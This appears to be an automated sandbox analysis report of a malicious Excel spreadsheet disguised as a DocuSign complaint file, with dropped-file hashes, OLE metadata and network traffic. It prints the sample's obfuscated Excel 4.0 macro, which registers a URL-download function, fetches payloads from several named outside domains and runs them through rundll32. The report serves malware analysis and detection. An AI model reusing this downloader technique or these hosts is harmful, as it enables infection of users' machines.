                        Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                        C:\Users\user\AppData\Local\Temp\TarEE95.tmp
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):152788
                        Entropy (8bit):6.316654432555028
                        Encrypted:false
                        SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                        MD5:64FEDADE4387A8B92C120B21EC61E394
                        SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                        SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                        SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                        Malicious:false
                        Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Complaint-1992179913-02182021.LNK
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Tue Feb 23 22:49:40 2021, atime=Tue Feb 23 22:49:40 2021, length=57856, window=hide
                        Category:dropped
                        Size (bytes):2218
                        Entropy (8bit):4.495765973363477
                        Encrypted:false
                        SSDEEP:48:8p/XT0jF4hF0ZtFFRMQh2p/XT0jF4hF0ZtFFRMQ/:8p/XojF4zE/FRMQh2p/XojF4zE/FRMQ/
                        MD5:42F80CBD3DCDA3D663F6C7E32B72F474
                        SHA1:C460FF502E75EDF28ED330E303EC22B4058D3DF7
                        SHA-256:9EDB612EC602B219EB451D4A131320AEAE7D68D586E4D33D30CBB16D8B47095F
                        SHA-512:23C30C244F28B8B77984772E24094FF5474F48508AD3E4EE77D80CF0A7F6E742ECA4CBB5912678890F7709CE07E29BF5ADDA2451197E357E605BAE03A25C0126
                        Malicious:false
                        Preview: L..................F.... ...[.v..{.....>...I...>................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..:..WR1. .COMPLA~1.XLS..p.......Q.y.Q.y*...8.....................C.o.m.p.l.a.i.n.t.-.1.9.9.2.1.7.9.9.1.3.-.0.2.1.8.2.0.2.1...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop\Complaint-1992179913-02182021.xls.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.m.p.l.a.i.n.t.-.1.9.9.2.1.7.9.9.1.3.-.0.2.1.8.2.0.2.1...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....
                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Feb 23 22:49:40 2021, atime=Tue Feb 23 22:49:40 2021, length=8192, window=hide
                        Category:dropped
                        Size (bytes):867
                        Entropy (8bit):4.482199419348991
                        Encrypted:false
                        SSDEEP:12:85Qt4FKLgXg/XAlCPCHaXtB8XzB/KkcX+WnicvbASbDtZ3YilMMEpxRljKQgTdJU:85JC/XTd6j8YeM+Dv3qRMrNru/
                        MD5:2F74E7C64915C3397C972A3F62CA5915
                        SHA1:54048D9D3C228FD9E93512CC4990D2F5B77FC02E
                        SHA-256:708E59D9A803D9504AF334A5BA56F5C3B977107A3278E3DC6D48B19E0FB0826B
                        SHA-512:6B9779D6E95CB19D90C66556EF33FFEB1D2AA14812908180D70530C656B1595E4E3C763216A2C99BCFF64E664548F5F6B2EBF0EAF5C8D08D7962B0527F627317
                        Malicious:false
                        Preview: L..................F...........7G.....>......>.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....WR5...Desktop.d......QK.XWR5.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......494126..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):140
                        Entropy (8bit):4.6378923533221235
                        Encrypted:false
                        SSDEEP:3:oyBVomMYlIFc7FXrl+1lIFc7FXrlmMYlIFc7FXrlv:dj6YlycZbalycZbxYlycZb1
                        MD5:6A7B4C954CE096AD8FDAA29641236A8C
                        SHA1:B2DE2B101CC2101D13B8D16AC9FD4253D0E14E24
                        SHA-256:BCF555F9537B00AF4CF501AB4F2D527AEB8246C9970AD4F8BD0B9256C8CBCB04
                        SHA-512:5D53F0C0E26DE11674231EC28C2F0EB0E7E7F80CAEF298E5BA47BDAEA23021D2DA30DCE0772FEA55ADF6F59B99D1B1A2C3688268F73DF0189D52DC64E29F7E86
                        Malicious:false
                        Preview: Desktop.LNK=0..[xls]..Complaint-1992179913-02182021.LNK=0..Complaint-1992179913-02182021.LNK=0..[xls]..Complaint-1992179913-02182021.LNK=0..
                        C:\Users\user\Desktop\76DE0000
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Applesoft BASIC program data, first line number 16
                        Category:dropped
                        Size (bytes):88220
                        Entropy (8bit):6.550018613106071
                        Encrypted:false
                        SSDEEP:1536:rP8rmjAItyzElBIL6lECbgBGGP5xLmQWVxdrfsjoaGzeNTrjQaGzeNTHcYVRDZKS:rP8rmjAItyzElBIL6lECbgBGGP5xLm7S
                        MD5:F7131FFF9A829328EC88D57AE6838B12
                        SHA1:3DBB0B17BA212B188B7436575DA56A98D580770F
                        SHA-256:D6E73D03E6A43DD4E0E6C06D368BF56BA3BEFDACCBD528F530C7E965986421AF
                        SHA-512:04291DA4AD4461114D47CD7D1CA1CC8D2128739B87E0C72FA4EF74B426C1E2ADA9BD78C22A8FA1352D38F9AB8ED8175E5EE811148397E5F480C3722EA336D76C
                        Malicious:false
                        Preview: ........g2..........................\.p....user B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

                        Static File Info

                        General

                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: Friner, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Feb 18 13:42:21 2021, Security: 0
                        Entropy (8bit):3.697666945848156
                        TrID:
                        • Microsoft Excel sheet (30009/1) 78.94%
                        • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                        File name:Complaint-1992179913-02182021.xls
                        File size:145920
                        MD5:b2c46df91cfe891f61af65277461b32b
                        SHA1:fd329e179663a40c31f5c567228a59349928a6a5
                        SHA256:3b9790a911cff3e1572608f3cc377a3776c63014c4230eebc46b0a220f22b1f5
                        SHA512:809890b32a5f370054043a5abbbffdb45e1b1bf5e8f781d2f5537e26b9c5a171c450559e731ec6bbc5b798f3a131e94bb9f06d3523e7a362182b035203a6fcbb
                        SSDEEP:3072:GcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOMRt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/9:GcPiTQAVW/89BQnmlcGvgZ7r3J8YUOM0
                        File Content Preview:........................>......................................................................................................................................................................................................................................

                        File Icon

                        Icon Hash:e4eea286a4b4bcb4

                        Static OLE Info

                        General

                        Document Type:OLE
                        Number of OLE Files:1

                        OLE File "Complaint-1992179913-02182021.xls"

                        Indicators

                        Has Summary Info:True
                        Application Name:Microsoft Excel
                        Encrypted Document:False
                        Contains Word Document Stream:False
                        Contains Workbook/Book Stream:True
                        Contains PowerPoint Document Stream:False
                        Contains Visio Document Stream:False
                        Contains ObjectPool Stream:
                        Flash Objects Count:
                        Contains VBA Macros:True

                        Summary

                        Code Page:1251
                        Author:
                        Last Saved By:Friner
                        Create Time:2006-09-16 00:00:00
                        Last Saved Time:2021-02-18 13:42:21
                        Creating Application:Microsoft Excel
                        Security:0

                        Document Summary

                        Document Code Page:1251
                        Thumbnail Scaling Desired:False
                        Contains Dirty Links:False

                        Streams

                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                        General
                        Stream Path:\x5DocumentSummaryInformation
                        File Type:data
                        Stream Size:4096
                        Entropy:0.321292606979
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00
                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                        General
                        Stream Path:\x5SummaryInformation
                        File Type:data
                        Stream Size:4096
                        Entropy:0.2746714277
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                        Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 135085
                        General
                        Stream Path:Book
                        File Type:Applesoft BASIC program data, first line number 8
                        Stream Size:135085
                        Entropy:3.69042254796
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . F r i n e r B . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . B I O L A F E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . A . . . . . . . . . . . . .
                        Data Raw:09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 06 46 72 69 6e 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                        Macro 4.0 Code

                        ,,,,,,,,,,"=RIGHT(""dfrgbrd4567w547547w7b,DllRegister"",12)&T26",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""1""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""2""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""3""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""4""&T19,41))",,,=HALT(),,,,,,,,,,,
                        ,,,Server,,,,,,,,,,,,,,,,=NOW(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(D129,DocuSign!T26)",,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(A130*1000000000000000,B133)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""ghydbetrf46et5eb645bv7ea45istbsebtuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""45bh4g5nuwyftneragntrnrfaktsgbutnrkltgrkbownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCCBB"",""BIOLAFE"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=BIOLAFE(0,T137&B138&B133&D145&D146&D147&D148,D141,0,0)",rzminc.com/xklyulyijvn/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B139&B133&D145&D146&D147&D148,D141&""1"",0,0)",pathinanchilearthmovers.com/eznwcdhx/,,"=RIGHT(""hiuhnUBGYGBYnt7t67tb67rIftfFFDFFDTbtrdrtdgjcndll32"",6)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B140&B133&D145&D146&D147&D148,D141&""2"",0,0)",jugueterialatorre.com.ar/xjzpfwc/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B141&B133&D145&D146&D147&D148,D141&""3"",0,0)",rzminc.com/fdzgprclatqo/,,"=RIGHT(""nnhjgbgvdvgekvnrtve6reb6tn6rdtryt6smy65ty56s445nr6x..\JDFR.hdfgr"",13)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B142&B133&D145&D146&D147&D148,D141&""4"",0,0)",biblicalisraeltours.com/otmchxmxeg/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,t,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Feb 23, 2021 15:50:05.331130981 CET4916580192.168.2.2272.52.227.180
                        Feb 23, 2021 15:50:05.488856077 CET804916572.52.227.180192.168.2.22
                        Feb 23, 2021 15:50:05.488946915 CET4916580192.168.2.2272.52.227.180
                        Feb 23, 2021 15:50:05.491146088 CET4916580192.168.2.2272.52.227.180
                        Feb 23, 2021 15:50:05.647500992 CET804916572.52.227.180192.168.2.22
                        Feb 23, 2021 15:50:05.969320059 CET804916572.52.227.180192.168.2.22
                        Feb 23, 2021 15:50:05.969367981 CET804916572.52.227.180192.168.2.22
                        Feb 23, 2021 15:50:05.969517946 CET4916580192.168.2.2272.52.227.180
                        Feb 23, 2021 15:50:05.970381975 CET4916580192.168.2.2272.52.227.180
                        Feb 23, 2021 15:50:06.060266972 CET4916680192.168.2.22162.241.80.6
                        Feb 23, 2021 15:50:06.126840115 CET804916572.52.227.180192.168.2.22
                        Feb 23, 2021 15:50:06.220350981 CET8049166162.241.80.6192.168.2.22
                        Feb 23, 2021 15:50:06.220453978 CET4916680192.168.2.22162.241.80.6
                        Feb 23, 2021 15:50:06.221399069 CET4916680192.168.2.22162.241.80.6
                        Feb 23, 2021 15:50:06.379880905 CET8049166162.241.80.6192.168.2.22
                        Feb 23, 2021 15:50:07.055249929 CET8049166162.241.80.6192.168.2.22
                        Feb 23, 2021 15:50:07.055619955 CET4916680192.168.2.22162.241.80.6
                        Feb 23, 2021 15:50:07.372119904 CET4916780192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:07.656344891 CET8049167138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:07.656495094 CET4916780192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:07.657131910 CET4916780192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:07.943605900 CET8049167138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:08.604717016 CET8049167138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:08.604767084 CET8049167138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:08.604985952 CET4916780192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:08.617775917 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:08.904891014 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:08.905150890 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:08.917357922 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:09.202397108 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:09.204022884 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:09.204051971 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:09.204065084 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:09.204185009 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:09.204241991 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:09.216017008 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:09.502155066 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:09.502310038 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:11.235893011 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:11.561037064 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:12.055818081 CET8049166162.241.80.6192.168.2.22
                        Feb 23, 2021 15:50:12.056047916 CET4916680192.168.2.22162.241.80.6
                        Feb 23, 2021 15:50:13.477612972 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.477648973 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.477665901 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.477695942 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.477715015 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.477731943 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.477746010 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.477761984 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.477777958 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.477797031 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.477832079 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.477833033 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.477838039 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.477843046 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.477847099 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.477852106 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.477874994 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.488809109 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.488879919 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.494765043 CET4917280192.168.2.2272.52.227.180
                        Feb 23, 2021 15:50:13.606369972 CET8049167138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.606532097 CET4916780192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.655329943 CET804917272.52.227.180192.168.2.22
                        Feb 23, 2021 15:50:13.655441046 CET4917280192.168.2.2272.52.227.180
                        Feb 23, 2021 15:50:13.655874968 CET4917280192.168.2.2272.52.227.180
                        Feb 23, 2021 15:50:13.762976885 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763005972 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763037920 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763052940 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763068914 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763091087 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763099909 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763128042 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763133049 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763135910 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763139009 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763159990 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763161898 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763165951 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763186932 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763186932 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763196945 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763211966 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763226032 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763236046 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763247967 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763261080 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763268948 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763284922 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763300896 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763305902 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763322115 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763329029 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763339996 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763354063 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763365030 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763376951 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763387918 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763400078 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763415098 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763422966 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763436079 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763446093 CET44349168138.36.237.100192.168.2.22
                        Feb 23, 2021 15:50:13.763459921 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.763483047 CET49168443192.168.2.22138.36.237.100
                        Feb 23, 2021 15:50:13.816329956 CET804917272.52.227.180192.168.2.22
